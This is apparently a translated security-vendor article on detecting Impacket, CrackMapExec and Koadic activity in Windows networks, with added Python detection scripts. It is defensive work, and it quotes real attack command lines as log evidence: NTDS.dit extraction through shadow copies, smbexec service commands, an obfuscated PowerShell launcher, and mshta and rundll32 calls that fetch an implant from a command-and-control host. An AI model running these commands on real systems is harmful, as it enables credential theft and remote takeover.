How to detect attacks on Windows infrastructure: studying hacker tools

The number of attacks on the corporate sector grows every year: for example, 13% more unique incidents were recorded in 2017 than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period, including those in which the Windows operating system is the main working environment. In 2017-2018 the APT groups Dragonfly, APT28 and MuddyWater carried out attacks on government and military organizations in Europe, North America and Saudi Arabia, and they used three tools for this: Impacket, CrackMapExec and Koadic. The source code of all three is open and available on GitHub.

It is worth noting that these tools are not used for initial penetration but for developing the attack inside the infrastructure. Attackers use them at various stages of an attack after the perimeter has been breached. This, incidentally, is hard to detect, and often only with technologies that identify traces of compromise in network traffic or with tools that reveal the attacker's active actions after they have entered the infrastructure. The tools offer a wide range of functions, from transferring files to interacting with the registry and executing commands on a remote machine. We studied these tools to determine their network activity.

What we needed to do:

  • Understand how the hacking tools work: find out what the attackers need in order to use them and which technologies they can rely on.
  • Find what information security tools missed in the early stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider or because the attacker is exploiting a previously unknown hole in the infrastructure. Reconstructing the whole chain of their actions then becomes possible, hence the wish to detect further movement.
  • Eliminate false positives in intrusion detection tools. We must not forget that detecting certain actions on the basis of reconnaissance alone can produce frequent errors. An infrastructure usually contains enough ways, indistinguishable from legitimate ones at first glance, to obtain almost any information.

What do these tools give attackers? With Impacket, attackers get a large library of modules that can be used at various stages of an attack after the perimeter has been breached. Many tools use Impacket modules internally; Metasploit, for example, has dcomexec and wmiexec for remote command execution and secretsdump for obtaining accounts from memory, all of which were added from Impacket. As a result, correctly detecting the activity of such a library also ensures detection of its derivatives.

It is no coincidence that the creators of CrackMapExec (or simply CME) wrote "Powered by Impacket" about it. On top of that, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, injection of Meterpreter or an Empire agent for remote execution, and Bloodhound on board.

The third tool we chose was Koadic. It is fairly recent: it was presented at the international hacker conference DEFCON 25 in 2017 and stands out for its unusual approach, working over HTTP with JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. Its creators call it COM Command & Control, or C3.

IMPACKET

The functionality of Impacket is very broad, from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials: the SMB relay attack and retrieving the ntds.dit file, which contains user password hashes, from the domain controller. Impacket also executes commands remotely using four different methods: WMI, the Windows Scheduler Management Service, DCOM and SMB, and it needs credentials to do so.

Secretsdump

Let us look at secretsdump. This module can target both user machines and domain controllers. It can be used to obtain copies of the LSA, SAM, SECURITY and NTDS.dit memory areas, so it can appear at different stages of an attack. The first step in the module's operation is authentication over SMB, which requires either the user's password or its hash in order to perform the Pass-the-Hash attack automatically. Next comes a request to open access to the Service Control Manager (SCM) and to obtain access to the registry via the winreg protocol, where the attacker can find the data of the branches of interest and retrieve the results over SMB.

In Fig. 1 we see that when the winreg protocol is used, access is obtained via a registry key containing LSA. This is done with the DCERPC command with opcode 15, OpenKey.

Fig. 1. Opening a registry key using the winreg protocol

Next, once access to the key has been obtained, the values are saved with the SaveKey command, opcode 20. Impacket does this in a very characteristic way: it saves the values to a file whose name is a string of 8 random characters with .tmp appended. That file is then retrieved over SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining a registry key from a remote machine

It follows that such activity on the network can be detected by the queries to specific registry branches over the winreg protocol, by specific names, and by the commands and their order.

This module also leaves traces in the Windows event log, which makes it easy to detect. For example, as a result of running the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

In the Windows Server 2016 log we will see the following key sequence of events:

1. 4624 - remote logon.
2. 5145 - checking access rights to the remote winreg service.
3. 5145 - checking access rights to a file in the System32 directory. The file has the random name mentioned above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - process creation with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - process creation with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - process creation with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like many post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on the remote machine. This module also requires authentication over SMB, either with a password or with a password hash. Fig. 3 shows an example of how such a tool works, in this case a local administrator console.

Fig. 3. Interactive smbexec console

The first step smbexec takes after authentication is to open the SCM with the OpenSCManagerW (15) command. The request is notable: the MachineName field says DUMMY.

Fig. 4. Request to open the Service Control Manager

Next, a service is created with the CreateServiceW (12) command. In the case of smbexec, the same command construction logic can be seen every time. In Fig. 5, green marks the command parameters that do not change and yellow marks what the attacker can change. It is easy to see that the name of the executable, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service via the Service Control Manager

Smbexec also leaves obvious traces in the Windows event log. In the Windows Server 2016 log, for an interactive command shell running the ipconfig command, we will see the following key sequence of events:

1. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of a cmd.exe process with the arguments from point 1.
3. 5145 - checking access rights to the __output file in the C$ share.
4. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a cmd.exe process with the arguments from point 4.
6. 5145 - checking access rights to the __output file in the C$ share.

Impacket is the foundation on which attack tools are built. It supports almost every protocol in a Windows infrastructure and at the same time has its own characteristic features: the specific winreg requests, the use of the SCM API with its characteristic command construction, the file name format, and the SYSTEM32 SMB share.
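As an added example (not code from the article or from the Impacket project), the following Python script turns the event patterns above, for both the secretsdump and the smbexec sequences, into a detection: it matches the execute.bat wrapper in 4688 and 4697 records and the __output and 8-letter .tmp file accesses in 5145 records. The event dictionaries and their field names (CommandLine, ServiceFileName, ShareName, RelativeTargetName) are constructed sample input, and the ADMIN$ share name used for the hive dump is an assumption.

```python
import re

# Wrapper that smbexec (via a service, 4697) and secretsdump -exec-method mmcexec
# (via cmd.exe, 4688) use for every command: echo <cmd> into %TEMP%\execute.bat,
# run it, delete it. Output goes to __output on \\127.0.0.1\C$ or in %SYSTEMROOT%\Temp.
IMPACKET_BATCH = re.compile(
    r"/Q /c echo (?P<cmd>.+?) \^> "
    r"(?:\\\\127\.0\.0\.1\\C\$|%SYSTEMROOT%\\Temp)\\__output"
    r".*?> %TEMP%\\execute\.bat & .*?%TEMP%\\execute\.bat & del %TEMP%\\execute\.bat",
    re.IGNORECASE,
)
# secretsdump saves a hive as <8 random letters>.tmp in System32, then reads it over SMB.
HIVE_TMP = re.compile(r"(?:^|\\)system32\\[a-z]{8}\.tmp$", re.IGNORECASE)


def inspect_event(ev):
    """Return (tag, detail) findings for one Security-log event given as a dict."""
    eid = ev["EventID"]
    findings = []
    if eid in (4688, 4697):
        # 4688 carries the process command line, 4697 the installed service's file name
        field = "CommandLine" if eid == 4688 else "ServiceFileName"
        m = IMPACKET_BATCH.search(ev.get(field, ""))
        if m:
            findings.append(("impacket_batch", m.group("cmd")))
    elif eid == 5145:
        target = ev.get("RelativeTargetName", "")
        if target.lower().endswith("__output"):
            findings.append(("impacket_output", ev.get("ShareName", "")))
        elif HIVE_TMP.search(target):
            findings.append(("hive_tmp", target))
    return findings


def scan(events):
    """Run inspect_event over a list of events; findings come back in log order."""
    out = []
    for ev in events:
        out.extend(inspect_event(ev))
    return out


# Constructed sample events modelled on the sequences above (not real log exports).
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3},
    {"EventID": 4697, "ServiceFileName": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"EventID": 4688, "CommandLine": r"%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"EventID": 5145, "ShareName": r"\\*\C$", "RelativeTargetName": "__output"},
    {"EventID": 4688, "CommandLine": r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    # share name is an assumption; the 8-letter file name is made up
    {"EventID": 5145, "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"SYSTEM32\AbCdEfGh.tmp"},
    {"EventID": 4688, "CommandLine": r'"C:\Windows\system32\cmd.exe" /c ipconfig /all'},  # benign
]

if __name__ == "__main__":
    for tag, detail in scan(SAMPLE_EVENTS):
        print(tag, detail)
```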

I-CRACKMAPEXEC

The CME tool is designed primarily to automate the routine actions an attacker has to perform to advance inside the network. It can work together with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, enables advanced reconnaissance inside the network. It collects data about users, machines, groups and sessions and is supplied as a PowerShell script or a binary. LDAP or SMB-based protocols are used to collect the information. The CME integration module lets Bloodhound be downloaded to the victim machine, run, and its collected data retrieved after execution, thereby automating the actions on the system and making them less noticeable. The Bloodhound graphical shell presents the collected data as graphs, which makes it possible to find the shortest path from the attacker's machine to the domain administrator.

Fig. 6. Bloodhound interface

To run on the victim machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: a call to cmd.exe with obfuscated code passed as arguments in XML format.

Fig. 7. Creating a task via CME

After the task has been submitted for execution, the victim machine starts Bloodhound itself, and this can be seen in the traffic. The module is characterized by LDAP queries to obtain the standard groups and a list of all machines and users in the domain, and by obtaining information about active user sessions through the SRVSVC NetSessEnum request.

Fig. 8. Obtaining the list of active sessions over SMB

In addition, when auditing is enabled, the launch of Bloodhound on the victim machine is accompanied by an event with ID 4688 (process creation) and the process name C:\Windows\System32\cmd.exe. What stands out are the command line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
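As an added example that is not part of the article or of CME, the Python helper below flags a launcher line like the one above and resolves its two obfuscation tricks, the $env:COMSPEC index selection and the [char[]](...) code-point array, so an analyst can read what the command actually invokes. It assumes the default COMSPEC value C:\WINDOWS\system32\cmd.exe, and its sample line is a constructed version of the one above in which the elided character array has been replaced by a complete, harmless one.

```python
import re

# Default %COMSPEC% on Windows (assumption); the obfuscation indexes characters out of it.
COMSPEC = r"C:\WINDOWS\system32\cmd.exe"
# $env:COMSPEC[4,26,25]-join''   (any casing, optional spaces)
COMSPEC_IDX = re.compile(r"\$env:comspec\[([0-9,\s]+)\]\s*-join\s*''", re.I)
# [char[]](91, 78, ...)-join''   -> the string those code points spell
CHAR_ARRAY = re.compile(r"\[char\[\]\]\(\s*([0-9,\s]+)\)\s*-join\s*''", re.I)
# launcher flags seen in the CME Bloodhound line: -exec bypass -noni -nop -w 1
LAUNCHER_FLAGS = re.compile(r"-exec bypass\b.*-noni\b.*-nop\b.*-w 1\b", re.I)


def resolve_comspec_index(index_list):
    """'4,26,25' -> the characters of COMSPEC at those positions ('Iex')."""
    return "".join(COMSPEC[int(i)] for i in index_list.split(",") if i.strip())


def decode_char_array(code_points):
    """'91,78,101' -> '[Ne'."""
    return "".join(chr(int(c)) for c in code_points.split(",") if c.strip())


def deobfuscate(cmdline):
    """Replace both tricks in a command line with the text they evaluate to."""
    step = COMSPEC_IDX.sub(lambda m: resolve_comspec_index(m.group(1)), cmdline)
    return CHAR_ARRAY.sub(lambda m: decode_char_array(m.group(1)), step)


def is_cme_style_launcher(cmdline):
    """True when the launcher flags or either obfuscation trick is present."""
    return bool(LAUNCHER_FLAGS.search(cmdline)
                or COMSPEC_IDX.search(cmdline)
                or CHAR_ARRAY.search(cmdline))


# Constructed sample: the line above with a complete, harmless character array
# spelling [Net.Dns]::GetHostName() in place of the elided one.
SAMPLE_4688 = (
    'cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & '
    "( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 68, 110, 115, 93, "
    "58, 58, 71, 101, 116, 72, 111, 115, 116, 78, 97, 109, 101, 40,41 )-jOIN'' ) \""
)

if __name__ == "__main__":
    print(is_cme_style_launcher(SAMPLE_4688))
    print(deobfuscate(SAMPLE_4688))
```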

Enum_avproducts

The enum_avproducts module is very interesting in terms of both functionality and implementation. WMI allows the WQL query language to be used to obtain data about various Windows objects, and that is exactly what this CME module uses. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim machine. To obtain the required data, the module connects to the root\SecurityCenter2 namespace, then generates a WQL query and receives the response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (Trace WMI-Activity), whose events contain useful information about WQL queries, is often disabled. But if it is enabled, then when the enum_avproducts script is run an event with ID 11 will be recorded. It will contain the name of the user who sent the request and the root\SecurityCenter2 namespace name.

Each CME module had its own artifacts, whether specific WQL queries, the creation of a certain type of task in the Task Scheduler with obfuscation, or Bloodhound-specific activity over LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living-off-the-land trend: it has no external dependencies and uses standard Windows tools. It is a full-fledged Command & Control (CnC) tool, since after infection an "implant" is installed on the machine that allows it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If privileges on the victim side are insufficient for full operation, Koadic can raise them using User Account Control bypass techniques (UAC bypass).

Fig. 10. Koadic shell

The victim must initiate the communication with the Command & Control server itself. To do so, it has to contact a pre-prepared URI and receive the main Koadic body via one of the stagers. Fig. 11 shows an example with the mshta stager.

Fig. 11. Initializing a session with the CnC server

From the WS variable in the response it is clear that execution happens through WScript.Shell, and the variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE hold key information about the parameters of the current session. This is the first request-response pair in an HTTP connection with the CnC server. Subsequent requests relate directly to the functionality of the modules (implants) that are called. All Koadic modules work only with an active session to the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways to launch it. Below is the request-response pair for downloading the Mimikatz implant.

Fig. 12. Passing Mimikatz to Koadic

Notice how the URI format in the request has changed. It now contains the value of the csrf variable, which selects the module. Ignore its name; we all know that CSRF is usually understood differently. The response was the same main Koadic body with Mimikatz-related code added. It is quite large, so let us look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of the execution is sent over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules capable of executing commands remotely. Here we see the same URI generation method and the familiar csrf variable. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Below is such code as contained in the HTTP response from the CnC server.

Fig. 14. Exec_cmd implant code

The GAWTUUGCFI variable with the familiar WS attribute is needed to execute the code. With it, the implant calls the shell, handling two code branches: shell.exec, which returns the output stream, and shell.run, which returns nothing.

Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:

  • the specific construction of its HTTP requests,
  • use of the winHttpRequests API,
  • creation of a WScript.Shell object via ActiveXObject,
  • a large executable body.

The initial connection is initiated by the stager, so its activity can be detected through Windows events. For mshta this is event 4688, which shows the creation of a process with the characteristic start attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, other 4688 events can be seen with attributes that characterize it well:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
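As an added example, not part of the article or of Koadic, the Python script below classifies 4688 command lines like those above into the stager, implant and exec_cmd artifacts and groups implant launches by Koadic session id, which is the correlation a responder needs to tie the stager, the module fetches and the command output files together. The sample command lines are constructed (documentation-range CnC address), the sid/csrf values are taken from the lines above, and the exact position of the URL inside the rundll32 line is an assumption.

```python
import re
from urllib.parse import urlsplit

# A URL argument; stops before Koadic's trailing "mshtml,RunHTMLApplication" or whitespace.
URL = r"https?://\S+?(?=mshtml,RunHTMLApplication|\s|$)"
# mshta stager: mshta.exe fetching the Koadic body from the CnC URI.
MSHTA_STAGER = re.compile(r"(?:^|\\)mshta\.exe\s+(?P<url>" + URL + r")", re.I)
# implant relaunch: rundll32 handing a sid/csrf URI to mshtml,RunHTMLApplication.
RUNDLL_HTA = re.compile(
    r"(?:^|\\)rundll32\.exe\s+(?P<url>" + URL + r").*mshtml,RunHTMLApplication", re.I)
# exec_cmd wrapper: chcp 437, the command, output into a GUID-named .txt under Temp.
EXEC_CMD = re.compile(
    r"/q /c chcp 437 & (?P<cmd>.+?) 1> "
    r"(?P<out>\S*\\Temp\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.txt) 2>&1", re.I)


def koadic_params(url):
    """Split a Koadic URI into its path and the ';'-separated sid/csrf parameters."""
    parts = urlsplit(url)
    params = {}
    for piece in parts.query.split(";"):
        piece = piece.strip()
        if "=" in piece:
            key, value = piece.split("=", 1)
            params[key] = value
    return parts.path, params


def classify(cmdline):
    """Describe the Koadic artifact in one 4688 command line, or return None."""
    m = MSHTA_STAGER.search(cmdline)
    if m:
        path, params = koadic_params(m.group("url"))
        return {"kind": "stager", "path": path, **params}
    m = RUNDLL_HTA.search(cmdline)
    if m:
        path, params = koadic_params(m.group("url"))
        return {"kind": "implant", "path": path, **params}
    m = EXEC_CMD.search(cmdline)
    if m:
        return {"kind": "exec_cmd", "cmd": m.group("cmd"), "out": m.group("out")}
    return None


def sessions(cmdlines):
    """Group implant launches by Koadic session id -> csrf (module) values, in order."""
    by_sid = {}
    for line in cmdlines:
        hit = classify(line)
        if hit and hit["kind"] == "implant":
            by_sid.setdefault(hit.get("sid", ""), []).append(hit.get("csrf", ""))
    return by_sid


# Constructed 4688 command lines modelled on the ones above (CnC address made up).
SAMPLE_4688 = [
    r"C:\Windows\system32\mshta.exe http://192.0.2.10:9999/dXpT6",
    r"rundll32.exe http://192.0.2.10:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c;csrf=;mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.0.2.10:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c;csrf=18f93a28e0874f0d8d475d154bed1983;mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /c ipconfig /all',  # benign
]

if __name__ == "__main__":
    for line in SAMPLE_4688:
        print(classify(line))
    print(sessions(SAMPLE_4688))
```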

Conclusions

Living off the land is gaining popularity among criminals. They use the tools and mechanisms built into Windows for their own needs. We see the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appearing ever more often in APT reports. The number of GitHub forks of these tools is also growing, and new ones keep appearing (there are already about a thousand of them now). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools; these are already on the victims' machines and help them bypass security measures. We focus on studying network communication: each of the tools described above leaves its own traces in network traffic, and a detailed study of them has allowed us to teach our product, PT Network Attack Discovery, to detect them, which ultimately helps investigate the entire chain of cyber incidents in which they are involved.

Authors:

  • Anton Tyurin, Head of the Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
